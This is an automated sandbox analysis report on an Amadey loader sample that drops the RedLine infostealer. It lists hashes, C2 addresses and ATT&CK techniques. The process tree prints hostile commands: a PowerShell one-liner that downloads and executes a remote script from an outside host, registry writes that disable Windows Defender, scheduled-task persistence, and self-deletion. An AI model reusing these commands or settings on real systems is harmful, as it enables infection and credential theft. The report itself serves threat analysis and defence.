amadey | b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67

Analysis

max time kernel
52s
max time network
117s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
21-03-2023 00:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe
Size

960KB
MD5

435d35c9fbfa24c22b75af34b888f5d8
SHA1

1cf5b4598d925f6c07e640f82697b0c6f0603470
SHA256

b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67
SHA512

ed15dc153ee41c43d610019f8a003390f50314975fbd28a1629130b15995743b6403e127c07a4a6f038f0619bba049bec9b8ea5ac5ae7f2bf1896ab448440acf
SSDEEP

12288:kMrEy9099YhUTqPDT/DjFnPiCvky0Ah3clhtrLpci0cC8XYKpTEe53aLuJVr6cGZ:wyqQUiuOcXDchx8oK5HfbkH3jyI

Score

10^/10

amadey redline 14 gena vint discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.mdegmm.com/pdf/debug2.ps1

Extracted

Family

redline

Botnet

gena

193.233.20.30:4125

Attributes

auth_value
93c20961cb6b06b2d5781c212db6201e

Extracted

Family

redline

Botnet

vint

193.233.20.30:4125

Attributes

auth_value
fb8811912f8370b3d23bffda092d88d0

Extracted

Family

amadey

Version

3.68

62.204.41.87/joomla/index.php

Extracted

Family

redline

Botnet

45.12.253.144:40145

Attributes

auth_value
6528d0f243ad9e530a68f2a487521a80

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

tz9613.exev4840vR.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	tz9613.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	v4840vR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	tz9613.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	tz9613.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	tz9613.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	tz9613.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	v4840vR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	v4840vR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	v4840vR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	v4840vR.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 22 IoCs

Processes:

resource	yara_rule
behavioral1/memory/988-200-0x00000000049D0000-0x0000000004A16000-memory.dmp	family_redline
behavioral1/memory/988-201-0x0000000004A50000-0x0000000004A94000-memory.dmp	family_redline
behavioral1/memory/988-202-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-203-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-205-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-207-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-209-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-211-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-213-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-215-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-217-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-219-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-221-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-223-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-225-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-227-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-229-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-235-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-233-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-231-0x0000000004A50000-0x0000000004A8E000-memory.dmp	family_redline
behavioral1/memory/988-378-0x0000000004A90000-0x0000000004AA0000-memory.dmp	family_redline
behavioral1/memory/988-1125-0x0000000004A90000-0x0000000004AA0000-memory.dmp	family_redline

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

29 4460 powershell.exe
Downloads MZ/PE file

flow	pid	process
29	4460	powershell.exe

Executes dropped EXE 13 IoCs

Processes:

zap6445.exezap5162.exezap7279.exetz9613.exev4840vR.exew28IK23.exexbmVZ47.exey35fU11.exelegenda.exebuil.exesqlcmd.exeworld.exesqlcmd.exe

pid	process
2416	zap6445.exe
2680	zap5162.exe
3348	zap7279.exe
2064	tz9613.exe
3496	v4840vR.exe
988	w28IK23.exe
4704	xbmVZ47.exe
3920	y35fU11.exe
2748	legenda.exe
5056	buil.exe
4112	sqlcmd.exe
4120	world.exe
2388	sqlcmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

v4840vR.exetz9613.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	v4840vR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	tz9613.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	v4840vR.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exezap6445.exezap5162.exezap7279.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap6445.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	zap6445.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap5162.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	zap5162.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap7279.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	zap7279.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4948 schtasks.exe
Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

2672 PING.EXE
2648 PING.EXE
1736 PING.EXE
1284 PING.EXE
4744 PING.EXE
4112 PING.EXE
320 PING.EXE
4384 PING.EXE
1624 PING.EXE

flow	ioc
18	ip-api.com

pid	process
4948	schtasks.exe

pid	process
2672	PING.EXE
2648	PING.EXE
1736	PING.EXE
1284	PING.EXE
4744	PING.EXE
4112	PING.EXE
320	PING.EXE
4384	PING.EXE
1624	PING.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

tz9613.exev4840vR.exew28IK23.exexbmVZ47.exepowershell.exe

pid	process
2064	tz9613.exe
2064	tz9613.exe
3496	v4840vR.exe
3496	v4840vR.exe
988	w28IK23.exe
988	w28IK23.exe
4704	xbmVZ47.exe
4704	xbmVZ47.exe
4460	powershell.exe
4460	powershell.exe
4460	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

tz9613.exev4840vR.exew28IK23.exexbmVZ47.exebuil.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2064	tz9613.exe
Token: SeDebugPrivilege	3496	v4840vR.exe
Token: SeDebugPrivilege	988	w28IK23.exe
Token: SeDebugPrivilege	4704	xbmVZ47.exe
Token: SeDebugPrivilege	5056	buil.exe
Token: SeDebugPrivilege	4460	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exezap6445.exezap5162.exezap7279.exey35fU11.exelegenda.execmd.exePING.EXEbuil.execmd.execmd.exe

description	pid	process	target process
PID 2140 wrote to memory of 2416	2140	b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe	zap6445.exe
PID 2140 wrote to memory of 2416	2140	b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe	zap6445.exe
PID 2140 wrote to memory of 2416	2140	b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe	zap6445.exe
PID 2416 wrote to memory of 2680	2416	zap6445.exe	zap5162.exe
PID 2416 wrote to memory of 2680	2416	zap6445.exe	zap5162.exe
PID 2416 wrote to memory of 2680	2416	zap6445.exe	zap5162.exe
PID 2680 wrote to memory of 3348	2680	zap5162.exe	zap7279.exe
PID 2680 wrote to memory of 3348	2680	zap5162.exe	zap7279.exe
PID 2680 wrote to memory of 3348	2680	zap5162.exe	zap7279.exe
PID 3348 wrote to memory of 2064	3348	zap7279.exe	tz9613.exe
PID 3348 wrote to memory of 2064	3348	zap7279.exe	tz9613.exe
PID 3348 wrote to memory of 3496	3348	zap7279.exe	v4840vR.exe
PID 3348 wrote to memory of 3496	3348	zap7279.exe	v4840vR.exe
PID 3348 wrote to memory of 3496	3348	zap7279.exe	v4840vR.exe
PID 2680 wrote to memory of 988	2680	zap5162.exe	w28IK23.exe
PID 2680 wrote to memory of 988	2680	zap5162.exe	w28IK23.exe
PID 2680 wrote to memory of 988	2680	zap5162.exe	w28IK23.exe
PID 2416 wrote to memory of 4704	2416	zap6445.exe	xbmVZ47.exe
PID 2416 wrote to memory of 4704	2416	zap6445.exe	xbmVZ47.exe
PID 2416 wrote to memory of 4704	2416	zap6445.exe	xbmVZ47.exe
PID 2140 wrote to memory of 3920	2140	b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe	y35fU11.exe
PID 2140 wrote to memory of 3920	2140	b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe	y35fU11.exe
PID 2140 wrote to memory of 3920	2140	b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe	y35fU11.exe
PID 3920 wrote to memory of 2748	3920	y35fU11.exe	legenda.exe
PID 3920 wrote to memory of 2748	3920	y35fU11.exe	legenda.exe
PID 3920 wrote to memory of 2748	3920	y35fU11.exe	legenda.exe
PID 2748 wrote to memory of 4948	2748	legenda.exe	schtasks.exe
PID 2748 wrote to memory of 4948	2748	legenda.exe	schtasks.exe
PID 2748 wrote to memory of 4948	2748	legenda.exe	schtasks.exe
PID 2748 wrote to memory of 4384	2748	legenda.exe	cmd.exe
PID 2748 wrote to memory of 4384	2748	legenda.exe	cmd.exe
PID 2748 wrote to memory of 4384	2748	legenda.exe	cmd.exe
PID 4384 wrote to memory of 4376	4384	cmd.exe	cmd.exe
PID 4384 wrote to memory of 4376	4384	cmd.exe	cmd.exe
PID 4384 wrote to memory of 4376	4384	cmd.exe	cmd.exe
PID 4384 wrote to memory of 4436	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 4436	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 4436	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 1420	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 1420	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 1420	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 5024	4384	cmd.exe	cmd.exe
PID 4384 wrote to memory of 5024	4384	cmd.exe	cmd.exe
PID 4384 wrote to memory of 5024	4384	cmd.exe	cmd.exe
PID 4384 wrote to memory of 5100	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 5100	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 5100	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 5084	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 5084	4384	cmd.exe	cacls.exe
PID 4384 wrote to memory of 5084	4384	cmd.exe	cacls.exe
PID 2748 wrote to memory of 5056	2748	legenda.exe	buil.exe
PID 2748 wrote to memory of 5056	2748	legenda.exe	buil.exe
PID 2748 wrote to memory of 4112	2748	legenda.exe	sqlcmd.exe
PID 2748 wrote to memory of 4112	2748	legenda.exe	sqlcmd.exe
PID 2748 wrote to memory of 4112	2748	legenda.exe	sqlcmd.exe
PID 4112 wrote to memory of 1708	4112	PING.EXE	cmd.exe
PID 4112 wrote to memory of 1708	4112	PING.EXE	cmd.exe
PID 5056 wrote to memory of 68	5056	buil.exe	cmd.exe
PID 5056 wrote to memory of 68	5056	buil.exe	cmd.exe
PID 1708 wrote to memory of 4460	1708	cmd.exe	powershell.exe
PID 1708 wrote to memory of 4460	1708	cmd.exe	powershell.exe
PID 68 wrote to memory of 376	68	cmd.exe	chcp.com
PID 68 wrote to memory of 376	68	cmd.exe	chcp.com
PID 68 wrote to memory of 320	68	cmd.exe	PING.EXE

C:\Users\Admin\AppData\Local\Temp\b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe
"C:\Users\Admin\AppData\Local\Temp\b5abc931378a0c83b8f5b18b679b559c555b9d9ea1531173dd146327bd477c67.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2140

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap6445.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap6445.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2416

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap5162.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap5162.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2680

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap7279.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap7279.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3348

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz9613.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz9613.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v4840vR.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v4840vR.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w28IK23.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w28IK23.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xbmVZ47.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xbmVZ47.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y35fU11.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y35fU11.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3920

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2748

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
4⤵
- Creates scheduled task(s)
PID:4948

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
4⤵
- Suspicious use of WriteProcessMemory
PID:4384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:4376

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:N"
5⤵
PID:4436

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:R" /E
5⤵
PID:1420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:5024

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:N"
5⤵
PID:5100

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:R" /E
5⤵
PID:5084

C:\Users\Admin\AppData\Local\Temp\1000082001\buil.exe
"C:\Users\Admin\AppData\Local\Temp\1000082001\buil.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5056

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1000082001\buil.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:68

C:\Windows\system32\chcp.com
chcp 65001
6⤵
PID:376

C:\Windows\system32\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:320

C:\Users\Admin\AppData\Local\Temp\1000087001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000087001\sqlcmd.exe"
4⤵
- Executes dropped EXE
PID:4112

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
- Suspicious use of WriteProcessMemory
PID:1708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000087001\sqlcmd.exe" >> NUL
5⤵
PID:1612

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:2648

C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe
"C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe"
4⤵
- Executes dropped EXE
PID:4120

C:\Users\Admin\AppData\Local\Temp\1000098001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000098001\sqlcmd.exe"
4⤵
- Executes dropped EXE
PID:2388

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:4900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
PID:2244

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000098001\sqlcmd.exe" >> NUL
5⤵
PID:4352

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:4384

C:\Users\Admin\AppData\Local\Temp\1000099001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000099001\sqlcmd.exe"
4⤵
PID:2288

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:3724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
PID:4424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000099001\sqlcmd.exe" >> NUL
5⤵
PID:1204

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:1624

C:\Users\Admin\AppData\Local\Temp\1000100001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000100001\sqlcmd.exe"
4⤵
PID:4808

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:1628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
PID:4420

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000100001\sqlcmd.exe" >> NUL
5⤵
PID:2204

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:4744

C:\Users\Admin\AppData\Local\Temp\1000101001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000101001\sqlcmd.exe"
4⤵
PID:4272

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:4324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
PID:1644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000101001\sqlcmd.exe" >> NUL
5⤵
PID:3996

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:1736

C:\Users\Admin\AppData\Local\Temp\1000102001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000102001\sqlcmd.exe"
4⤵
PID:1808

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:4972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000102001\sqlcmd.exe" >> NUL
5⤵
PID:1376

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:1284

C:\Users\Admin\AppData\Local\Temp\1000103001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000103001\sqlcmd.exe"
4⤵
PID:2796

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:1636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
PID:3120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000103001\sqlcmd.exe" >> NUL
5⤵
PID:4892

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
- Suspicious use of WriteProcessMemory
PID:4112

C:\Users\Admin\AppData\Local\Temp\1000104001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000104001\sqlcmd.exe"
4⤵
PID:4904

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:3144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
PID:4696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000104001\sqlcmd.exe" >> NUL
5⤵
PID:4136

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:2672

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:4244

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize
2KB

MD5
